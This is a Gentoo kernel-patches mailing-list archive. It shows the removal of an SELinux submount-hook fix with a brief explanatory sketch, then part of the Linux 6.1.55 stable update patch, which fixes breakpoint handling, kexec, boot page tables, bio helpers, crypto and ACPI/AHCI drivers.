-selinux_set_mnt_opts() relies on the fact that the mount options pointer
-is always NULL when all options are unset (specifically in its
-!selinux_initialized() branch. However, the new
-selinux_fs_context_submount() hook breaks this rule by allocating a new
-structure even if no options are set. That causes any submount created
-before a SELinux policy is loaded to be rejected in
-selinux_set_mnt_opts().
-
-Fix this by making selinux_fs_context_submount() leave fc->security
-set to NULL when there are no options to be copied from the reference
-superblock.
-
-Reported-by: Adam Williamson <awilliam@xxxxxxxxxx>
-Link: https://bugzilla.redhat.com/show_bug.cgi?id=2236345
-Fixes: d80a8f1b58c2 ("vfs, security: Fix automount superblock LSM init problem, preventing NFS sb sharing")
-Signed-off-by: Ondrej Mosnacek <omosnace@xxxxxxxxxx>
----
- security/selinux/hooks.c | 10 ++++++++--
- 1 file changed, 8 insertions(+), 2 deletions(-)
-
-diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
-index 10350534de6d6..2aa0e219d7217 100644
---- a/security/selinux/hooks.c
-+++ b/security/selinux/hooks.c
-@@ -2775,14 +2775,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
- static int selinux_fs_context_submount(struct fs_context *fc,
- 				   struct super_block *reference)
- {
--	const struct superblock_security_struct *sbsec;
-+	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
- 	struct selinux_mnt_opts *opts;
- 
-+	/*
-+	 * Ensure that fc->security remains NULL when no options are set
-+	 * as expected by selinux_set_mnt_opts().
-+	 */
-+	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
-+		return 0;
-+
- 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
- 	if (!opts)
- 		return -ENOMEM;
- 
--	sbsec = selinux_superblock(reference);
- 	if (sbsec->flags & FSCONTEXT_MNT)
- 		opts->fscontext_sid = sbsec->sid;
- 	if (sbsec->flags & CONTEXT_MNT)
--- 
-2.41.0
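
For reference, the removed fix boils down to an early return in the
submount hook so that fc->security stays NULL when the reference
superblock carries no SELinux mount options. A minimal C sketch of that
pattern (the function name is illustrative, not the exact kernel code):

	/* Keep fc->security NULL when no options are set, matching what
	 * selinux_set_mnt_opts() expects before a policy is loaded. */
	static int submount_opts_sketch(struct fs_context *fc,
					struct super_block *reference)
	{
		const struct superblock_security_struct *sbsec =
			selinux_superblock(reference);

		if (!(sbsec->flags & (FSCONTEXT_MNT | CONTEXT_MNT | DEFCONTEXT_MNT)))
			return 0;	/* nothing to copy: leave fc->security NULL */

		/* ...otherwise allocate a selinux_mnt_opts struct and copy
		 * the context SIDs from sbsec, as in the hunk above... */
		return 0;
	}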


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-23 10:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-23 10:16 UTC (permalink / raw)
  To: gentoo-commits

commit:     ef07f67f88d6a918eb7d3f2cd2627d293e7ef30f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep 23 10:16:09 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep 23 10:16:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ef07f67f

Linux patch 6.1.55

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1054_linux-6.1.55.patch | 6107 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6111 insertions(+)

diff --git a/0000_README b/0000_README
index e831e898..44dd3ca6 100644
--- a/0000_README
+++ b/0000_README
@@ -259,6 +259,10 @@ Patch:  1053_linux-6.1.54.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.54
 
+Patch:  1054_linux-6.1.55.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.55
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1054_linux-6.1.55.patch b/1054_linux-6.1.55.patch
new file mode 100644
index 00000000..b9b1e43f
--- /dev/null
+++ b/1054_linux-6.1.55.patch
@@ -0,0 +1,6107 @@
+diff --git a/Documentation/admin-guide/cgroup-v1/memory.rst b/Documentation/admin-guide/cgroup-v1/memory.rst
+index 34911ce5e4b50..2524061836acc 100644
+--- a/Documentation/admin-guide/cgroup-v1/memory.rst
++++ b/Documentation/admin-guide/cgroup-v1/memory.rst
+@@ -91,6 +91,8 @@ Brief summary of control files.
+  memory.oom_control		     set/show oom controls.
+  memory.numa_stat		     show the number of memory usage per numa
+ 				     node
++ memory.kmem.limit_in_bytes          This knob is deprecated and writing to
++                                     it will return -ENOTSUPP.
+  memory.kmem.usage_in_bytes          show current kernel memory allocation
+  memory.kmem.failcnt                 show the number of kernel memory usage
+ 				     hits limits
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index b3c8ac6a2c385..9000640f7f7a0 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -193,6 +193,9 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Hisilicon      | Hip08 SMMU PMCG | #162001800      | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
++| Hisilicon      | Hip08 SMMU PMCG | #162001900      | N/A                         |
++|                | Hip09 SMMU PMCG |                 |                             |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Qualcomm Tech. | Kryo/Falkor v1  | E1003           | QCOM_FALKOR_ERRATUM_1003    |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Makefile b/Makefile
+index 844afa653fdda..3d839824a7224 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 54
++SUBLEVEL = 55
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/hw_breakpoint.c b/arch/arm/kernel/hw_breakpoint.c
+index 054e9199f30db..dc0fb7a813715 100644
+--- a/arch/arm/kernel/hw_breakpoint.c
++++ b/arch/arm/kernel/hw_breakpoint.c
+@@ -626,7 +626,7 @@ int hw_breakpoint_arch_parse(struct perf_event *bp,
+ 	hw->address &= ~alignment_mask;
+ 	hw->ctrl.len <<= offset;
+ 
+-	if (is_default_overflow_handler(bp)) {
++	if (uses_default_overflow_handler(bp)) {
+ 		/*
+ 		 * Mismatch breakpoints are required for single-stepping
+ 		 * breakpoints.
+@@ -798,7 +798,7 @@ static void watchpoint_handler(unsigned long addr, unsigned int fsr,
+ 		 * Otherwise, insert a temporary mismatch breakpoint so that
+ 		 * we can single-step over the watchpoint trigger.
+ 		 */
+-		if (!is_default_overflow_handler(wp))
++		if (!uses_default_overflow_handler(wp))
+ 			continue;
+ step:
+ 		enable_single_step(wp, instruction_pointer(regs));
+@@ -811,7 +811,7 @@ step:
+ 		info->trigger = addr;
+ 		pr_debug("watchpoint fired: address = 0x%x\n", info->trigger);
+ 		perf_bp_event(wp, regs);
+-		if (is_default_overflow_handler(wp))
++		if (uses_default_overflow_handler(wp))
+ 			enable_single_step(wp, instruction_pointer(regs));
+ 	}
+ 
+@@ -886,7 +886,7 @@ static void breakpoint_handler(unsigned long unknown, struct pt_regs *regs)
+ 			info->trigger = addr;
+ 			pr_debug("breakpoint fired: address = 0x%x\n", addr);
+ 			perf_bp_event(bp, regs);
+-			if (is_default_overflow_handler(bp))
++			if (uses_default_overflow_handler(bp))
+ 				enable_single_step(bp, addr);
+ 			goto unlock;
+ 		}
+diff --git a/arch/arm/kernel/machine_kexec.c b/arch/arm/kernel/machine_kexec.c
+index f567032a09c0b..6d1938d1b4df7 100644
+--- a/arch/arm/kernel/machine_kexec.c
++++ b/arch/arm/kernel/machine_kexec.c
+@@ -92,16 +92,28 @@ void machine_crash_nonpanic_core(void *unused)
+ 	}
+ }
+ 
++static DEFINE_PER_CPU(call_single_data_t, cpu_stop_csd) =
++	CSD_INIT(machine_crash_nonpanic_core, NULL);
++
+ void crash_smp_send_stop(void)
+ {
+ 	static int cpus_stopped;
+ 	unsigned long msecs;
++	call_single_data_t *csd;
++	int cpu, this_cpu = raw_smp_processor_id();
+ 
+ 	if (cpus_stopped)
+ 		return;
+ 
+ 	atomic_set(&waiting_for_crash_ipi, num_online_cpus() - 1);
+-	smp_call_function(machine_crash_nonpanic_core, NULL, false);
++	for_each_online_cpu(cpu) {
++		if (cpu == this_cpu)
++			continue;
++
++		csd = &per_cpu(cpu_stop_csd, cpu);
++		smp_call_function_single_async(cpu, csd);
++	}
++
+ 	msecs = 1000; /* Wait at most a second for the other cpus to stop */
+ 	while ((atomic_read(&waiting_for_crash_ipi) > 0) && msecs) {
+ 		mdelay(1);
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index e1ab5b5189949..4a77b650c0d8d 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -73,7 +73,7 @@
+ 			reg = <0x0 0xffc40000 0x0 0xc0000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 		};
+ 
+ 		cmdline_mem: memory@ffd00000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 34c8de4f43fba..cea7ca3f326fc 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -346,7 +346,7 @@
+ 			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index 04c71f74ab72d..c9aa7764fc59a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -127,7 +127,7 @@
+ 			reg = <0x0 0xffc00000 0x0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 3b710c6a326a5..3b306dfb91e0d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -126,7 +126,7 @@
+ 			reg = <0x0 0xffc00000 0x0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/kernel/hw_breakpoint.c b/arch/arm64/kernel/hw_breakpoint.c
+index b29a311bb0552..9659a9555c63a 100644
+--- a/arch/arm64/kernel/hw_breakpoint.c
++++ b/arch/arm64/kernel/hw_breakpoint.c
+@@ -654,7 +654,7 @@ static int breakpoint_handler(unsigned long unused, unsigned long esr,
+ 		perf_bp_event(bp, regs);
+ 
+ 		/* Do we need to handle the stepping? */
+-		if (is_default_overflow_handler(bp))
++		if (uses_default_overflow_handler(bp))
+ 			step = 1;
+ unlock:
+ 		rcu_read_unlock();
+@@ -733,7 +733,7 @@ static u64 get_distance_from_watchpoint(unsigned long addr, u64 val,
+ static int watchpoint_report(struct perf_event *wp, unsigned long addr,
+ 			     struct pt_regs *regs)
+ {
+-	int step = is_default_overflow_handler(wp);
++	int step = uses_default_overflow_handler(wp);
+ 	struct arch_hw_breakpoint *info = counter_arch_bp(wp);
+ 
+ 	info->trigger = addr;
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index ee8f47aef98b3..dd6486097e1dc 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -352,7 +352,7 @@ KBUILD_LDFLAGS		+= -m $(ld-emul)
+ 
+ ifdef need-compiler
+ CHECKFLAGS += $(shell $(CC) $(KBUILD_CFLAGS) -dM -E -x c /dev/null | \
+-	egrep -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
++	grep -E -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
+ 	sed -e "s/^\#define /-D'/" -e "s/ /'='/" -e "s/$$/'/" -e 's/\$$/&&/g')
+ endif
+ 
+diff --git a/arch/mips/vdso/Makefile b/arch/mips/vdso/Makefile
+index f72658b3a53f7..1f7d5c6c10b08 100644
+--- a/arch/mips/vdso/Makefile
++++ b/arch/mips/vdso/Makefile
+@@ -71,7 +71,7 @@ KCOV_INSTRUMENT := n
+ 
+ # Check that we don't have PIC 'jalr t9' calls left
+ quiet_cmd_vdso_mips_check = VDSOCHK $@
+-      cmd_vdso_mips_check = if $(OBJDUMP) --disassemble $@ | egrep -h "jalr.*t9" > /dev/null; \
++      cmd_vdso_mips_check = if $(OBJDUMP) --disassemble $@ | grep -E -h "jalr.*t9" > /dev/null; \
+ 		       then (echo >&2 "$@: PIC 'jalr t9' calls are not supported"; \
+ 			     rm -f $@; /bin/false); fi
+ 
+diff --git a/arch/powerpc/platforms/pseries/ibmebus.c b/arch/powerpc/platforms/pseries/ibmebus.c
+index a870cada7acd2..ed5fc70b7353a 100644
+--- a/arch/powerpc/platforms/pseries/ibmebus.c
++++ b/arch/powerpc/platforms/pseries/ibmebus.c
+@@ -455,6 +455,7 @@ static int __init ibmebus_bus_init(void)
+ 	if (err) {
+ 		printk(KERN_WARNING "%s: device_register returned %i\n",
+ 		       __func__, err);
++		put_device(&ibmebus_bus_device);
+ 		bus_unregister(&ibmebus_bus_type);
+ 
+ 		return err;
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index c08bb5c3b3857..b3b96ff46d193 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -98,7 +98,13 @@ static int elf_find_pbase(struct kimage *image, unsigned long kernel_len,
+ 	kbuf.image = image;
+ 	kbuf.buf_min = lowest_paddr;
+ 	kbuf.buf_max = ULONG_MAX;
+-	kbuf.buf_align = PAGE_SIZE;
++
++	/*
++	 * Current riscv boot protocol requires 2MB alignment for
++	 * RV64 and 4MB alignment for RV32
++	 *
++	 */
++	kbuf.buf_align = PMD_SIZE;
+ 	kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 	kbuf.memsz = ALIGN(kernel_len, PAGE_SIZE);
+ 	kbuf.top_down = false;
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index 321a5011042d4..b4155273df891 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -67,6 +67,14 @@ static void *alloc_pgt_page(void *context)
+ 		return NULL;
+ 	}
+ 
++	/* Consumed more tables than expected? */
++	if (pages->pgt_buf_offset == BOOT_PGT_SIZE_WARN) {
++		debug_putstr("pgt_buf running low in " __FILE__ "\n");
++		debug_putstr("Need to raise BOOT_PGT_SIZE?\n");
++		debug_putaddr(pages->pgt_buf_offset);
++		debug_putaddr(pages->pgt_buf_size);
++	}
++
+ 	entry = pages->pgt_buf + pages->pgt_buf_offset;
+ 	pages->pgt_buf_offset += PAGE_SIZE;
+ 
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index 9191280d9ea31..215d37f7dde8a 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -40,23 +40,40 @@
+ #ifdef CONFIG_X86_64
+ # define BOOT_STACK_SIZE	0x4000
+ 
++/*
++ * Used by decompressor's startup_32() to allocate page tables for identity
++ * mapping of the 4G of RAM in 4-level paging mode:
++ * - 1 level4 table;
++ * - 1 level3 table;
++ * - 4 level2 table that maps everything with 2M pages;
++ *
++ * The additional level5 table needed for 5-level paging is allocated from
++ * trampoline_32bit memory.
++ */
+ # define BOOT_INIT_PGT_SIZE	(6*4096)
+-# ifdef CONFIG_RANDOMIZE_BASE
++
+ /*
+- * Assuming all cross the 512GB boundary:
+- * 1 page for level4
+- * (2+2)*4 pages for kernel, param, cmd_line, and randomized kernel
+- * 2 pages for first 2M (video RAM: CONFIG_X86_VERBOSE_BOOTUP).
+- * Total is 19 pages.
++ * Total number of page tables kernel_add_identity_map() can allocate,
++ * including page tables consumed by startup_32().
++ *
++ * Worst-case scenario:
++ *  - 5-level paging needs 1 level5 table;
++ *  - KASLR needs to map kernel, boot_params, cmdline and randomized kernel,
++ *    assuming all of them cross 256T boundary:
++ *    + 4*2 level4 table;
++ *    + 4*2 level3 table;
++ *    + 4*2 level2 table;
++ *  - X86_VERBOSE_BOOTUP needs to map the first 2M (video RAM):
++ *    + 1 level4 table;
++ *    + 1 level3 table;
++ *    + 1 level2 table;
++ * Total: 28 tables
++ *
++ * Add 4 spare table in case decompressor touches anything beyond what is
++ * accounted above. Warn if it happens.
+  */
+-#  ifdef CONFIG_X86_VERBOSE_BOOTUP
+-#   define BOOT_PGT_SIZE	(19*4096)
+-#  else /* !CONFIG_X86_VERBOSE_BOOTUP */
+-#   define BOOT_PGT_SIZE	(17*4096)
+-#  endif
+-# else /* !CONFIG_RANDOMIZE_BASE */
+-#  define BOOT_PGT_SIZE		BOOT_INIT_PGT_SIZE
+-# endif
++# define BOOT_PGT_SIZE_WARN	(28*4096)
++# define BOOT_PGT_SIZE		(32*4096)
+ 
+ #else /* !CONFIG_X86_64 */
+ # define BOOT_STACK_SIZE	0x1000
+diff --git a/arch/x86/include/asm/linkage.h b/arch/x86/include/asm/linkage.h
+index f484d656d34ee..3a0282a6a55df 100644
+--- a/arch/x86/include/asm/linkage.h
++++ b/arch/x86/include/asm/linkage.h
+@@ -8,6 +8,14 @@
+ #undef notrace
+ #define notrace __attribute__((no_instrument_function))
+ 
++#ifdef CONFIG_64BIT
++/*
++ * The generic version tends to create spurious ENDBR instructions under
++ * certain conditions.
++ */
++#define _THIS_IP_ ({ unsigned long __here; asm ("lea 0(%%rip), %0" : "=r" (__here)); __here; })
++#endif
++
+ #ifdef CONFIG_X86_32
+ #define asmlinkage CPP_ASMLINKAGE __attribute__((regparm(0)))
+ #endif /* CONFIG_X86_32 */
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 42abd6af11984..d28e0987aa85b 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -19,6 +19,10 @@ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ # optimization flags.
+ KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
+ 
++# When LTO is enabled, llvm emits many text sections, which is not supported
++# by kexec. Remove -flto=* flags.
++KBUILD_CFLAGS := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 91ffee6fc8cb4..4533eb4916610 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -124,23 +124,18 @@ int bio_integrity_add_page(struct bio *bio, struct page *page,
+ 			   unsigned int len, unsigned int offset)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+-	struct bio_vec *iv;
+ 
+ 	if (bip->bip_vcnt >= bip->bip_max_vcnt) {
+ 		printk(KERN_ERR "%s: bip_vec full\n", __func__);
+ 		return 0;
+ 	}
+ 
+-	iv = bip->bip_vec + bip->bip_vcnt;
+-
+ 	if (bip->bip_vcnt &&
+ 	    bvec_gap_to_prev(&bdev_get_queue(bio->bi_bdev)->limits,
+ 			     &bip->bip_vec[bip->bip_vcnt - 1], offset))
+ 		return 0;
+ 
+-	iv->bv_page = page;
+-	iv->bv_len = len;
+-	iv->bv_offset = offset;
++	bvec_set_page(&bip->bip_vec[bip->bip_vcnt], page, len, offset);
+ 	bip->bip_vcnt++;
+ 
+ 	return len;
+diff --git a/block/bio.c b/block/bio.c
+index d5cd825d6efc0..9ec72a78f1149 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -976,10 +976,7 @@ int bio_add_hw_page(struct request_queue *q, struct bio *bio,
+ 	if (bio->bi_vcnt >= queue_max_segments(q))
+ 		return 0;
+ 
+-	bvec = &bio->bi_io_vec[bio->bi_vcnt];
+-	bvec->bv_page = page;
+-	bvec->bv_len = len;
+-	bvec->bv_offset = offset;
++	bvec_set_page(&bio->bi_io_vec[bio->bi_vcnt], page, len, offset);
+ 	bio->bi_vcnt++;
+ 	bio->bi_iter.bi_size += len;
+ 	return len;
+@@ -1055,15 +1052,10 @@ EXPORT_SYMBOL_GPL(bio_add_zone_append_page);
+ void __bio_add_page(struct bio *bio, struct page *page,
+ 		unsigned int len, unsigned int off)
+ {
+-	struct bio_vec *bv = &bio->bi_io_vec[bio->bi_vcnt];
+-
+ 	WARN_ON_ONCE(bio_flagged(bio, BIO_CLONED));
+ 	WARN_ON_ONCE(bio_full(bio, len));
+ 
+-	bv->bv_page = page;
+-	bv->bv_offset = off;
+-	bv->bv_len = len;
+-
++	bvec_set_page(&bio->bi_io_vec[bio->bi_vcnt], page, len, off);
+ 	bio->bi_iter.bi_size += len;
+ 	bio->bi_vcnt++;
+ }
+diff --git a/crypto/lrw.c b/crypto/lrw.c
+index 8d59a66b65255..fb8892ed179f5 100644
+--- a/crypto/lrw.c
++++ b/crypto/lrw.c
+@@ -357,10 +357,10 @@ static int lrw_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	 * cipher name.
+ 	 */
+ 	if (!strncmp(cipher_name, "ecb(", 4)) {
+-		unsigned len;
++		int len;
+ 
+-		len = strlcpy(ecb_name, cipher_name + 4, sizeof(ecb_name));
+-		if (len < 2 || len >= sizeof(ecb_name))
++		len = strscpy(ecb_name, cipher_name + 4, sizeof(ecb_name));
++		if (len < 2)
+ 			goto err_free_inst;
+ 
+ 		if (ecb_name[len - 1] != ')')
+diff --git a/crypto/xts.c b/crypto/xts.c
+index de6cbcf69bbd6..b05020657cdc8 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -396,10 +396,10 @@ static int xts_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	 * cipher name.
+ 	 */
+ 	if (!strncmp(cipher_name, "ecb(", 4)) {
+-		unsigned len;
++		int len;
+ 
+-		len = strlcpy(ctx->name, cipher_name + 4, sizeof(ctx->name));
+-		if (len < 2 || len >= sizeof(ctx->name))
++		len = strscpy(ctx->name, cipher_name + 4, sizeof(ctx->name));
++		if (len < 2)
+ 			goto err_free_inst;
+ 
+ 		if (ctx->name[len - 1] != ')')
+diff --git a/drivers/acpi/acpica/psopcode.c b/drivers/acpi/acpica/psopcode.c
+index bef69e87a0a29..8c34c0ffb1d93 100644
+--- a/drivers/acpi/acpica/psopcode.c
++++ b/drivers/acpi/acpica/psopcode.c
+@@ -603,7 +603,7 @@ const struct acpi_opcode_info acpi_gbl_aml_op_info[AML_NUM_OPCODES] = {
+ 
+ /* 7E */ ACPI_OP("Timer", ARGP_TIMER_OP, ARGI_TIMER_OP, ACPI_TYPE_ANY,
+ 			 AML_CLASS_EXECUTE, AML_TYPE_EXEC_0A_0T_1R,
+-			 AML_FLAGS_EXEC_0A_0T_1R),
++			 AML_FLAGS_EXEC_0A_0T_1R | AML_NO_OPERAND_RESOLVE),
+ 
+ /* ACPI 5.0 opcodes */
+ 
+diff --git a/drivers/acpi/arm64/iort.c b/drivers/acpi/arm64/iort.c
+index 2e1cae53536f5..3a6cf5675e607 100644
+--- a/drivers/acpi/arm64/iort.c
++++ b/drivers/acpi/arm64/iort.c
+@@ -1699,7 +1699,10 @@ static void __init arm_smmu_v3_pmcg_init_resources(struct resource *res,
+ static struct acpi_platform_list pmcg_plat_info[] __initdata = {
+ 	/* HiSilicon Hip08 Platform */
+ 	{"HISI  ", "HIP08   ", 0, ACPI_SIG_IORT, greater_than_or_equal,
+-	 "Erratum #162001800", IORT_SMMU_V3_PMCG_HISI_HIP08},
++	 "Erratum #162001800, Erratum #162001900", IORT_SMMU_V3_PMCG_HISI_HIP08},
++	/* HiSilicon Hip09 Platform */
++	{"HISI  ", "HIP09   ", 0, ACPI_SIG_IORT, greater_than_or_equal,
++	 "Erratum #162001900", IORT_SMMU_V3_PMCG_HISI_HIP09},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 707d6811615b8..073d26ddb6c21 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -443,6 +443,15 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_BOARD_NAME, "Lenovo IdeaPad S405"),
+ 		},
+ 	},
++	{
++	 /* https://bugzilla.suse.com/show_bug.cgi?id=1208724 */
++	 .callback = video_detect_force_native,
++	 /* Lenovo Ideapad Z470 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Z470"),
++		},
++	},
+ 	{
+ 	 /* https://bugzilla.redhat.com/show_bug.cgi?id=1187004 */
+ 	 .callback = video_detect_force_native,
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index ec84da6cc1bff..5510657d4be81 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -112,6 +112,12 @@ static void lpi_device_get_constraints_amd(void)
+ 		union acpi_object *package = &out_obj->package.elements[i];
+ 
+ 		if (package->type == ACPI_TYPE_PACKAGE) {
++			if (lpi_constraints_table) {
++				acpi_handle_err(lps0_device_handle,
++						"Duplicate constraints list\n");
++				goto free_acpi_buffer;
++			}
++
+ 			lpi_constraints_table = kcalloc(package->package.count,
+ 							sizeof(*lpi_constraints_table),
+ 							GFP_KERNEL);
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 1645335b8d2df..805645efb3ccf 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -1884,6 +1884,15 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	else
+ 		dev_info(&pdev->dev, "SSS flag set, parallel bus scan disabled\n");
+ 
++	if (!(hpriv->cap & HOST_CAP_PART))
++		host->flags |= ATA_HOST_NO_PART;
++
++	if (!(hpriv->cap & HOST_CAP_SSC))
++		host->flags |= ATA_HOST_NO_SSC;
++
++	if (!(hpriv->cap2 & HOST_CAP2_SDS))
++		host->flags |= ATA_HOST_NO_DEVSLP;
++
+ 	if (pi.flags & ATA_FLAG_EM)
+ 		ahci_reset_em(host);
+ 
+diff --git a/drivers/ata/libahci.c b/drivers/ata/libahci.c
+index 954386a2b5002..1b1671c027cd3 100644
+--- a/drivers/ata/libahci.c
++++ b/drivers/ata/libahci.c
+@@ -1255,6 +1255,26 @@ static ssize_t ahci_activity_show(struct ata_device *dev, char *buf)
+ 	return sprintf(buf, "%d\n", emp->blink_policy);
+ }
+ 
++static void ahci_port_clear_pending_irq(struct ata_port *ap)
++{
++	struct ahci_host_priv *hpriv = ap->host->private_data;
++	void __iomem *port_mmio = ahci_port_base(ap);
++	u32 tmp;
++
++	/* clear SError */
++	tmp = readl(port_mmio + PORT_SCR_ERR);
++	dev_dbg(ap->host->dev, "PORT_SCR_ERR 0x%x\n", tmp);
++	writel(tmp, port_mmio + PORT_SCR_ERR);
++
++	/* clear port IRQ */
++	tmp = readl(port_mmio + PORT_IRQ_STAT);
++	dev_dbg(ap->host->dev, "PORT_IRQ_STAT 0x%x\n", tmp);
++	if (tmp)
++		writel(tmp, port_mmio + PORT_IRQ_STAT);
++
++	writel(1 << ap->port_no, hpriv->mmio + HOST_IRQ_STAT);
++}
++
+ static void ahci_port_init(struct device *dev, struct ata_port *ap,
+ 			   int port_no, void __iomem *mmio,
+ 			   void __iomem *port_mmio)
+@@ -1269,18 +1289,7 @@ static void ahci_port_init(struct device *dev, struct ata_port *ap,
+ 	if (rc)
+ 		dev_warn(dev, "%s (%d)\n", emsg, rc);
+ 
+-	/* clear SError */
+-	tmp = readl(port_mmio + PORT_SCR_ERR);
+-	dev_dbg(dev, "PORT_SCR_ERR 0x%x\n", tmp);
+-	writel(tmp, port_mmio + PORT_SCR_ERR);
+-
+-	/* clear port IRQ */
+-	tmp = readl(port_mmio + PORT_IRQ_STAT);
+-	dev_dbg(dev, "PORT_IRQ_STAT 0x%x\n", tmp);
+-	if (tmp)
+-		writel(tmp, port_mmio + PORT_IRQ_STAT);
+-
+-	writel(1 << port_no, mmio + HOST_IRQ_STAT);
